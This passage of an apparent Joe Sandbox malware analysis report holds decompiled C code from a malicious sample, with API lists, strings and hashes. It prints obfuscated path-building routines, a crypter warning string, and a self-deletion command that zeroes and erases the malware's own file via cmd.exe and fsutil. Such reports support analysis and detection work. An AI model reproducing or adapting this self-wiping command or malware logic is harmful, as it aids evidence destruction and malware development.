								_v24 = _t88 >> 0x00000012 & 0x00003f00;
								_t91 = 0xc9b0b0db;
								__eflags = _t140 - _t140 * 0x21d5 - 1;
								if(_t140 != _t140 * 0x21d5 - 1) {
									_t91 = 0x3da30a9b;
								}
								_v20 = _t91;
							} else {
								__eflags = _t83 - 0x8fec2d08;
								if(_t83 == 0x8fec2d08) {
									 *_v36 = 0;
									_v20 = 0x9c31a222;
								} else {
									__eflags = _t83 - 0x9c31a222;
									if(_t83 == 0x9c31a222) {
										_v24 = 0xffffff1d + (_v24 >> 0x00000003 & 0x03ffffff) * 0x9b;
										_v20 = 0x15e709b8;
									}
								}
							}
						}
					} else {
						__eflags = _t83 - 0xc9b0b0da;
						if(_t83 <= 0xc9b0b0da) {
							__eflags = _t83 - 0xb24e6ef6;
							if(_t83 == 0xb24e6ef6) {
								_v20 = 0x3da30a9b;
							} else {
								__eflags = _t83 - 0xbd00218a;
								if(_t83 == 0xbd00218a) {
									_v20 = 0x8fec2d08;
								} else {
									__eflags = _t83 - 0xbd7c45c1;
									if(_t83 == 0xbd7c45c1) {
										_push(_t83);
										_v40 = _t153;
										_push(2);
										_push(0x104);
										_t101 = E0043EBC9();
										_t153 = _t153 + 8;
										_v32 = _t101;
										_v20 = 0x374609b9;
									}
								}
							}
						} else {
							__eflags = _t83 - 0xcca7c3c9;
							if(_t83 > 0xcca7c3c9) {
								__eflags = _t83 - 0xcca7c3ca;
								if(_t83 == 0xcca7c3ca) {
									 *_v40 = 0;
									_v20 = 0x75badd0d;
								} else {
									__eflags = _t83 - 0xe1ac2d29;
									if(_t83 == 0xe1ac2d29) {
										_v20 = 0xcca7c3ca;
									}
								}
							} else {
								__eflags = _t83 - 0xc9b0b0db;
								if(_t83 == 0xc9b0b0db) {
									lstrcatW(_v32,  *(_a4 + 4));
									lstrcatW(_v32, "\\");
									lstrcatW(_v32, _a8);
									_v20 = 0xf92e82de;
								} else {
									__eflags = _t83 - 0xc9dd24ae;
									if(_t83 == 0xc9dd24ae) {
										_t145 = ((_t145 & 0xffffff80) << 0xb) + 0xfff30000;
										_v20 = 0x4b1c6c50;
									}
								}
							}
						}
					}
				}
			}

0x00403668
0x00403671
0x00403678
0x00403681
0x00403686
0x00403686
0x0040368e
0x0040368e
0x00403690
0x00403695
0x00403716
0x0040371b
0x00403839
0x0040383e
0x00403a24
0x00403a26
0x00403a2b
0x00403a30
0x00403a33
0x00403a3b
0x00403a3e
0x00403686
0x00403686
0x0040368e
0x0040368e
0x00000000
0x0040368e
0x00403686
0x00403844
0x00403849
0x00403a4a
0x00403686
0x00403686
0x0040368e
0x0040368e
0x00000000
0x0040368e
0x00000000
0x00403686
0x0040384f
0x00403854
0x00000000
0x00000000
0x0040385d
0x00403862
0x00403865
0x0040386a
0x0040386c
0x00403872
0x00403872
0x00403a92
0x00403a92
0x00000000
0x00403a92
0x00403721
0x00403726
0x004038f1
0x004038f6
0x00403ae5
0x00403aea
0x00000000
0x00000000
0x00403af0
0x00403afa
0x00403afa
0x00403914
0x00403917
0x0040372c
0x0040372c
0x00403731
0x0040398b
0x0040398e
0x00403737
0x00403737
0x0040373c
0x0040374b
0x00403750
0x00403758
0x0040375b
0x0040375b
0x0040373c
0x00403731
0x00000000
0x00403726
0x0040369c
0x004037b8
0x004037bd
0x004039e0
0x004037c3
0x004037c3
0x004037c8
0x004039f7
0x004039fa
0x004037ce
0x004037ce
0x004037d3
0x004037e2
0x004037e8
0x004037e8
0x004037d3
0x004037c8
0x00000000
0x004037bd
0x004036a7
0x0040389e
0x004038a3
0x00403aa0
0x00403aa6
0x00403ab1
0x00403ab7
0x00403abf
0x00403ac4
0x00000000
0x00403ac4
0x004038a9
0x004038ae
0x00000000
0x00000000
0x004038bd
0x004038bd
0x004038c3
0x004038c3
0x004036ad
0x004036b2
0x00403931
0x0040393c
0x00403947
0x0040394c
0x0040394f
0x004036b8
0x004036bd
0x004036c2
0x004036c2
0x004036bd
0x004036b2
0x00000000
0x004036cb
0x004036cb
0x004036d0
0x00403767
0x0040376c
0x0040387c
0x00403881
0x00403a56
0x00403a59
0x00403a5c
0x00000000
0x00403a5c
0x00403887
0x0040388c
0x00403a6b
0x00403a74
0x00403a7d
0x00403a81
0x00403a84
0x00403a89
0x00403a8b
0x00403a8d
0x00403a8d
0x00000000
0x00403a8b
0x00403892
0x00403897
0x00000000
0x00000000
0x00403772
0x00403772
0x00403777
0x0040399a
0x004039a0
0x004039a9
0x004039b2
0x004039b5
0x004039ba
0x004039bc
0x004039be
0x004039be
0x004039c3
0x0040377d
0x0040377d
0x00403782
0x004039ce
0x004039d4
0x00403788
0x00403788
0x0040378d
0x004037a9
0x004037ac
0x004037ac
0x0040378d
0x00403782
0x00403777
0x004036d6
0x004036d6
0x004036db
0x004037f4
0x004037f9
0x00403a0c
0x004037ff
0x004037ff
0x00403804
0x00403a18
0x0040380a
0x0040380a
0x0040380f
0x00403815
0x00403818
0x0040381b
0x0040381d
0x00403822
0x00403827
0x0040382a
0x0040382d
0x0040382d
0x0040380f
0x00403804
0x004036e1
0x004036e1
0x004036e6
0x004038cf
0x004038d4
0x00403ad3
0x00403ad9
0x004038da
0x004038da
0x004038df
0x004038e5
0x004038e5
0x004038df
0x004036ec
0x004036ec
0x004036f1
0x00403964
0x0040396e
0x00403976
0x00403978
0x004036f7
0x004036f7
0x004036fc
0x00403704
0x0040370a
0x0040370a
0x004036fc
0x004036f1
0x004036e6
0x004036db
0x004036d0

APIs

lstrcatW.KERNEL32(?,?), ref: 00403964
lstrcatW.KERNEL32(?,0045515A), ref: 0040396E
lstrcatW.KERNEL32(?,?), ref: 00403976
lstrcatW.KERNEL32(?,?), ref: 00403AA0
lstrcatW.KERNEL32(?,00455110), ref: 00403AA6
lstrcatW.KERNEL32(?,?), ref: 00403AB1
lstrcatW.KERNEL32(?,00455110), ref: 00403AB7
lstrcatW.KERNEL32(?,?), ref: 00403ABF

Strings

@T>, xrefs: 0040372C
@T>, xrefs: 00403872

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: lstrcat
String ID: @T>$ @T>
API String ID: 4038537762-1607520600
Opcode ID: bff635fa7282563bd2e6c3eb3ac87c85ec1c868b7128ed8ef5dbbef3daafbf01
Instruction ID: 4d31c936fcab1f37f8c050c69ac8fbf873e13a1c5aab49e782e7a5d8e800c3c4
Opcode Fuzzy Hash: bff635fa7282563bd2e6c3eb3ac87c85ec1c868b7128ed8ef5dbbef3daafbf01
Instruction Fuzzy Hash: 7CB199B1D0410A9BCF249F94C9455BEBEB8BB58301F250A3BD911F63E0D3798B419F9A

Uniqueness

Uniqueness Score: -1.00%

Function 004034D6 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 111
stringCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E004034D6(signed int __edx, WCHAR** _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16) {
				WCHAR* _v20;
				intOrPtr _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				intOrPtr _t25;
				WCHAR* _t34;
				WCHAR* _t37;
				WCHAR* _t41;
				WCHAR* _t42;
				signed int _t43;
				WCHAR** _t44;
				WCHAR* _t45;
				void* _t48;
				void* _t49;

				_t43 = __edx;
				_t49 = _t48 - 0x14;
				_t42 = _a12;
				_t45 = _a8;
				_t44 = _a4;
				_v24 = 0xd3455974;
				_t25 = 0xd3455974;
				L1:
				while(1) {
					do {
						if(_t25 <= 0xf811430c) {
							if(_t25 > 0xe1fbda46) {
								if(_t25 == 0xe1fbda47) {
									E0043F602(_v28);
									_t49 = _t49 + 4;
									_t25 = 0x401cbff9;
								} else {
									if(_t25 == 0xf66a3a0b) {
										_t25 = 0xf811430d;
									}
								}
							} else {
								if(_t25 == 0xd0c2f7c5) {
									_push(2);
									_push(0x104);
									_t37 = E0043EBC9();
									_t49 = _t49 + 8;
									_v36 = _t37;
									lstrcatW(_v36,  *_t44);
									lstrcatW(_v36, "/");
									lstrcatW(_v36, _t44[2]);
									_t25 = 0xfb8076a4;
								} else {
									if(_t25 == 0xd3455974) {
										_push(2);
										_push(0x104);
										_t41 = E0043EBC9();
										_t49 = _t49 + 8;
										_v32 = _t41;
										_t25 = 0xf66a3a0b;
									}
								}
							}
							continue;
						}
						if(_t25 <= 0x401cbff8) {
							if(_t25 != 0xf811430d) {
								goto L18;
							}
							_v20 = _t44[1];
							_t25 = 0x71034d87;
						} else {
							if(_t25 == 0x401cbff9) {
								lstrcatW(_v32, _t45);
								_t25 = 0xd0c2f7c5;
							} else {
								if(_t25 == 0x71034d87) {
									lstrcatW(_v32, _v20);
									_t34 = E0041F94C(L"45538e52191fe131243fae173d27eb3c363ae13c6500eb26313ae035360f");
									_t49 = _t49 + 4;
									_v28 = _t34;
									lstrcatW(_v32, _v28);
									_t25 = 0xe1fbda47;
								}
							}
						}
						continue;
						L18:
					} while (_t25 != 0xfb8076a4);
					_v24 = _t25;
					lstrcatW(_v36, E0041F94C(L"aab58e5185f0f625cfdbfd38c5dbfd7e"));
					E0043F602(_t26);
					lstrcatW(_v36, _t42);
					_push(_a16);
					_push(0xa00000);
					_push(0);
					_push(_v36);
					_push("*");
					_push(_v32);
					return E0040CD87(_t43);
				}
			}

0x004034d6
0x004034da
0x004034dd
0x004034e1
0x004034e5
0x004034e9
0x004034f1
0x00000000
0x004034fc
0x004034fc
0x00403501
0x00403508
0x00403580
0x004035fc
0x00403601
0x00403604
0x00403582
0x00403587
0x0040358d
0x0040358d
0x00403587
0x0040350a
0x0040350f
0x004035af
0x004035b1
0x004035b6
0x004035bb
0x004035be
0x004035c7
0x004035d2
0x004035db
0x004035dd
0x00403515
0x0040351a
0x0040351c
0x0040351e
0x00403523
0x00403528
0x0040352b
0x0040352f
0x0040352f
0x0040351a
0x0040350f
0x00000000
0x00403508
0x0040353b
0x0040359c
0x00000000
0x00000000
0x004035a1
0x004035a5
0x0040353d
0x00403542
0x004035ec
0x004035ee
0x00403548
0x0040354d
0x00403557
0x0040355e
0x00403563
0x00403566
0x00403572
0x00403574
0x00403574
0x0040354d
0x00403542
0x00000000
0x0040360e
0x0040360e
0x00403619
0x00403631
0x00403634
0x00403641
0x00403643
0x00403647
0x0040364c
0x0040364e
0x00403652
0x00403657
0x00403667
0x00403667

APIs

lstrcatW.KERNEL32(?,?), ref: 00403557
lstrcatW.KERNEL32(?,?), ref: 00403572
lstrcatW.KERNEL32(?,?), ref: 004035C7
lstrcatW.KERNEL32(00455110,00455110), ref: 004035D2
lstrcatW.KERNEL32(?,?), ref: 004035DB
lstrcatW.KERNEL32(?,?), ref: 004035EC
lstrcatW.KERNEL32(00000000,00000000), ref: 00403631
lstrcatW.KERNEL32(?,?), ref: 00403641

Strings

45538e52191fe131243fae173d27eb3c363ae13c6500eb26313ae035360f, xrefs: 00403559
aab58e5185f0f625cfdbfd38c5dbfd7e, xrefs: 0040361D

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: lstrcat
String ID: 45538e52191fe131243fae173d27eb3c363ae13c6500eb26313ae035360f$aab58e5185f0f625cfdbfd38c5dbfd7e
API String ID: 4038537762-820533355
Opcode ID: dc2753312a498270882ea2cab309cc0e1de57c4223a6c790cd8603c5d9b2ac7a
Instruction ID: 2f86122c261198a0916637d061ca3c6a318a525c21ece2c3987fe031a2185a85
Opcode Fuzzy Hash: dc2753312a498270882ea2cab309cc0e1de57c4223a6c790cd8603c5d9b2ac7a
Instruction Fuzzy Hash: 9031F8B09082457FDA115F16CC8392F7E99AF40755F14883BF848EA2A1C73ADD50AB4B

Uniqueness

Uniqueness Score: -1.00%

Function 00408400 Relevance: 16.1, APIs: 3, Strings: 6, Instructions: 333libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?), ref: 00408669
LoadLibraryA.KERNEL32(?), ref: 00408738
ExitProcess.KERNEL32 ref: 0040898E

Strings

l.dl, xrefs: 0040884F
Do you want to run a malware ?(Crypt build to disable this message), xrefs: 0040867A
ntdl, xrefs: 00408856
l, xrefs: 00408849
Warning, xrefs: 004086AB
ZwRaiseHardError, xrefs: 00408657

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: AddressExitLibraryLoadProcProcess
String ID: Do you want to run a malware ?(Crypt build to disable this message)$Warning$ZwRaiseHardError$l$l.dl$ntdl
API String ID: 881411216-2126731382
Opcode ID: 017b62aa4723278ece6b7746e49a941f1e1f769ca5d8442ebdecd91407570a36
Instruction ID: 487b13f109cd70631cc1ada5f7961d2b9baa3bd4a929d801714b6285a17bcf36
Opcode Fuzzy Hash: 017b62aa4723278ece6b7746e49a941f1e1f769ca5d8442ebdecd91407570a36
Instruction Fuzzy Hash: 42D170B1D0021A8BCF24DB98CA849BEBBB0EB84314F24453BD595F7391DB7899418B5B

Uniqueness

Uniqueness Score: -1.00%

Function 00428578 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 161
processfileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00428578() {
				char _t30;
				CHAR* _t45;
				CHAR* _t54;
				char _t55;
				char _t61;
				CHAR* _t63;
				CHAR* _t64;
				signed int _t65;
				CHAR* _t67;

				_t67 = (_t65 & 0xfffffff8) - 0x828;
				_t64 = _t67;
				_t64[0x18] = 0x204b3ed8;
				_t30 = 0x204b3ed8;
				L1:
				while(_t30 <= 0x204b3ed7) {
					if(_t30 <= 0xd7df6f28) {
						if(_t30 <= 0xc92049e6) {
							if(_t30 != 0x8a7477c9) {
								if(_t30 != 0x9a29c658) {
									continue;
								}
								_t64[0x18] = _t30;
								_t45 = _t64[8];
								_t63 =  &(_t64[0x20]);
								_push(_t45);
								_push(_t45);
								E0041F840(_t45, _t63, 0x800, _t64[0x10], _t64[0x1c]);
								WinExec(_t63, 0);
								ExitProcess(0);
							}
							E004338A0(_t64[0x10], "cmd.exe /c timeout /nobreak /t 3 & fsutil file setZeroData offset=0 length=%lu \"%s\" & erase \"%s\" & exit", 0x68);
							_t67 =  &(_t67[0xc]);
							_t30 = 0x435e3da1;
						} else {
							if(_t30 == 0xc92049e7) {
								GetCurrentProcessId();
								_t30 = 0x71c5912e;
							} else {
								if(_t30 == 0xca7d9612) {
									_t30 = 0xd7df6f29;
								}
							}
						}
					} else {
						if(_t30 > 0xe88c2599) {
							if(_t30 == 0xe88c259a) {
								_push(_t30);
								_t67 = _t67 - 0x64;
								_t64[0x10] = _t67;
								_t30 = 0x359a4a84;
							} else {
								if(_t30 == 0x17dbd9f7) {
									_push(_t30);
									_push(_t30);
									_t54 = _t67 & 0xfffffff8;
									_t67 = _t54;
									_t64[4] = _t54;
									_t30 = 0xe88c259a;
								}
							}
						} else {
							if(_t30 == 0xd7df6f29) {
								__imp__GetFileSizeEx(_t64[0x14], _t64[4]);
								_t30 = 0x709e7a25;
							} else {
								if(_t30 == 0xe3a20264) {
									_t55 = _t64[4];
									asm("adc eax, 0xffffffff");
									_t61 = _t64[4];
									 *_t61 =  *_t55 + 0xffffffff;
									 *((intOrPtr*)(_t61 + 4)) =  *((intOrPtr*)(_t55 + 4));
									_t30 = 0x5577d6d4;
								}
							}
						}
					}
				}
				if(_t30 <= 0x5577d6d3) {
					if(_t30 == 0x204b3ed8) {
						_push(_t30);
						_t67 = _t67 - 0x1fc;
						_t64[8] = _t67;
						_t30 = 0x17dbd9f7;
					} else {
						if(_t30 == 0x359a4a84) {
							GetModuleFileNameA(GetModuleHandleW(0), _t64[8], 0x200);
							_t64[0x14] = CreateFileA(_t64[8], 0x80000000, 7, 0, 3, 0, 0);
							_t30 = 0xca7d9612;
						} else {
							if(_t30 == 0x435e3da1) {
								_t64[0x1c] =  *(_t64[4]);
								_t30 = 0x5b1bebb4;
							}
						}
					}
				} else {
					if(_t30 > 0x709e7a24) {
						if(_t30 == 0x709e7a25) {
							_t64[0xc] = 0xfffffedd + _t64[0xc] * 0x5600;
							_t30 = 0xe3a20264;
						} else {
							if(_t30 == 0x71c5912e) {
								_t30 = 0x8a7477c9;
							}
						}
					} else {
						if(_t30 == 0x5577d6d4) {
							CloseHandle(_t64[0x14]);
							_t30 = 0xc92049e7;
						} else {
							if(_t30 == 0x5b1bebb4) {
								_t64[0xc] = (_t64[0xc] << 0x00000010 & 0x80000000) + 0xfd567000;
								_t30 = 0x9a29c658;
							}
						}
					}
				}
				goto L1;
			}

0x00428581
0x00428587
0x00428589
0x00428590
0x00000000
0x0042859d
0x004285a9
0x0042862b
0x004286d5
0x004287b4
0x00000000
0x00000000
0x004287ba
0x004287bd
0x004287c0
0x004287c3
0x004287c4
0x004287d1
0x004287dd
0x004287e4
0x004287e4
0x004286e5
0x004286ea
0x004286ed
0x00428631
0x00428636
0x0042871c
0x00428725
0x0042863c
0x00428641
0x00428647
0x00428647
0x00428641
0x00428636
0x004285ab
0x004285b0
0x00428689
0x00428780
0x00428781
0x00428786
0x0042878c
0x0042868f
0x00428694
0x0042869a
0x0042869b
0x0042869e
0x004286a1
0x004286a3
0x004286a6
0x004286a6
0x00428694
0x004285b6
0x004285bb
0x004286fd
0x00428703
0x004285c1
0x004285c6
0x004285c8
0x004285d3
0x004285d6
0x004285d9
0x004285db
0x004285de
0x004285de
0x004285c6
0x004285bb
0x004285b0
0x004285a9
0x004285ea
0x00428656
0x0042872f
0x00428730
0x00428738
0x0042873b
0x0042865c
0x00428661
0x00428755
0x00428770
0x00428776
0x00428667
0x0042866c
0x00428677
0x0042867a
0x0042867a
0x0042866c
0x00428661
0x004285ec
0x004285f1
0x004286b5
0x004287a2
0x004287a5
0x004286bb
0x004286c0
0x004286c6
0x004286c6
0x004286c0
0x004285f7
0x004285fc
0x00428710
0x00428712
0x00428602
0x00428607
0x00428619
0x0042861c
0x0042861c
0x00428607
0x004285fc
0x004285f1
0x00000000

APIs

GetFileSizeEx.KERNEL32(?,?), ref: 004286FD
CloseHandle.KERNEL32(?), ref: 00428710
GetCurrentProcessId.KERNEL32 ref: 0042871C
GetModuleHandleW.KERNEL32(00000000), ref: 00428746
GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 00428755
CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0042876A
WinExec.KERNEL32 ref: 004287DD
ExitProcess.KERNEL32 ref: 004287E4

Strings

cmd.exe /c timeout /nobreak /t 3 & fsutil file setZeroData offset=0 length=%lu "%s" & erase "%s" & exit, xrefs: 004286DD

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: File$HandleModuleProcess$CloseCreateCurrentExecExitNameSize
String ID: cmd.exe /c timeout /nobreak /t 3 & fsutil file setZeroData offset=0 length=%lu "%s" & erase "%s" & exit
API String ID: 3992844039-2583593486
Opcode ID: d183999410ed2f02af91f539a28b21b25d735066d3783c62b34173edc45b6ac1
Instruction ID: 4d186d77d0a8ec38fa2d273cc116ba13a8efdfcc2eb0264cc2a707755fb0a98c
Opcode Fuzzy Hash: d183999410ed2f02af91f539a28b21b25d735066d3783c62b34173edc45b6ac1
Instruction Fuzzy Hash: 0351D870701710AFCB309F69AD8492F76F4AB5C710BA0491FE16AC2751DB28F8849B9F

Uniqueness

Uniqueness Score: -1.00%

Function 0044BB2D Relevance: 13.8, APIs: 9, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 38%

			E0044BB2D(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				intOrPtr _v40;
				signed int _v48;
				void _v52;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				signed int _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;

				_t263 = E0044C06E(__ecx,  &_v76, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v52, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t191 + _t191;
				_t264 = _t263 | 0xffffffff;
				if(_v40 != _t264) {
					_t114 = E00447426(_t188, _t249, _t264, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(_t114 != _t264) {
						_v24 = _v24 & 0x00000000;
						_v28 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v20 =  !(_a16 >> 7) & 1;
						_push( &_v28);
						_push(_a12);
						memcpy(_t276,  &_v52, 1 << 2);
						_t196 = 0;
						_t253 = E0044BFD9();
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v52;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v52 | 0x00000040;
								}
								_v5 = _t124;
								E004475CA(_t196,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v16 = _t241;
								_v52 = _t241;
								 *( *((intOrPtr*)(0x461570 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x461570 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v5 = 0;
									_push( &_v5);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v52, _t205 << 2);
									_t134 = E0044C292(_t189, 0,  &_v52 + _t205 + _t205);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(_t267 == 0) {
										 *((char*)( *((intOrPtr*)(0x461570 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v5;
										 *( *((intOrPtr*)(0x461570 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x461570 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x461570 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v16 & 0x00000048;
										if((_v16 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0x461570 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v48;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v48 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v28);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v52, _t214 << 2);
											_t246 = E0044BFD9();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0x461570 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E0043C34C(GetLastError());
											 *( *((intOrPtr*)(0x461570 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x461570 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E00447539( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E0044C1E8(_t204,  *_t189);
									__eflags = _t267;
									if(_t267 == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E0044C510();
									return _t267;
								}
							}
							_t271 = GetLastError();
							E0043C34C(_t271);
							 *( *((intOrPtr*)(0x461570 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x461570 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(_t271 == 0) {
								 *((intOrPtr*)(E0043C326())) = 0xd;
							}
							goto L2;
						}
						_t233 = _v48;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0x461570 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E0043C34C(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v48 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v28);
						_push(_a12);
						memcpy(_t285,  &_v52, _t238 << 2);
						_t196 = 0;
						_t253 = E0044BFD9();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E0043C339()) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E0043C326())) = 0x18;
						goto L2;
					}
				} else {
					 *(E0043C339()) =  *_t186 & 0x00000000;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E0043C326()));
				}
			}

0x0044bb50
0x0044bb54
0x0044bb55
0x0044bb55
0x0044bb55
0x0044bb57
0x0044bb5d
0x0044bb78
0x0044bb7d
0x0044bb80
0x0044bb82
0x0044bb84
0x0044bba3
0x0044bbaa
0x0044bbb1
0x0044bbb4
0x0044bbc0
0x0044bbc3
0x0044bbcb
0x0044bbcc
0x0044bbcf
0x0044bbcf
0x0044bbd6
0x0044bbd8
0x0044bbdb
0x0044bbe3
0x0044bbe6
0x0044bc53
0x0044bc54
0x0044bc5a
0x0044bc5c
0x0044bca5
0x0044bca8
0x0044bcb1
0x0044bcb4
0x0044bcb7
0x0044bcb9
0x0044bcb9
0x0044bcb9
0x0044bcaa
0x0044bcad
0x0044bcad
0x0044bcbe
0x0044bcc1
0x0044bccd
0x0044bcd2
0x0044bcde
0x0044bce8
0x0044bcec
0x0044bcf6
0x0044bcf9
0x0044bd04
0x0044bd09
0x0044bd28
0x0044bd2b
0x0044bd2f
0x0044bd30
0x0044bd36
0x0044bd3b
0x0044bd3e
0x0044bd40
0x0044bd42
0x0044bd47
0x0044bd49
0x0044bd4b
0x0044bd4e
0x0044bd50
0x0044bd6a
0x0044bd8e
0x0044bd92
0x0044bd96
0x0044bd98
0x0044bd9c
0x0044bd9e
0x0044bda8
0x0044bdab
0x0044bdb2
0x0044bdb2
0x0044bdb2
0x0044bdb2
0x0044bd9c
0x0044bdb7
0x0044bdc3
0x0044bdc5
0x0044be50
0x0044be50
0x00000000
0x0044bdcb
0x0044bdcb
0x0044bdcf
0x00000000
0x00000000
0x0044bdd4
0x0044bde6
0x0044bdee
0x0044bdf1
0x0044bdf2
0x0044bdf5
0x0044bdfc
0x0044be01
0x0044be04
0x0044be38
0x0044be42
0x0044be42
0x0044be4c
0x00000000
0x0044be4c
0x0044be0d
0x0044be26
0x0044be2d
0x0044bc4d
0x00000000
0x0044bc4d
0x0044bdc5
0x0044bd52
0x00000000
0x0044bd0b
0x0044bd12
0x0044bd15
0x0044bd17
0x00000000
0x00000000
0x0044bd19
0x0044bd1b
0x0044bd1b
0x00000000
0x0044bd21
0x0044bd09
0x0044bc64
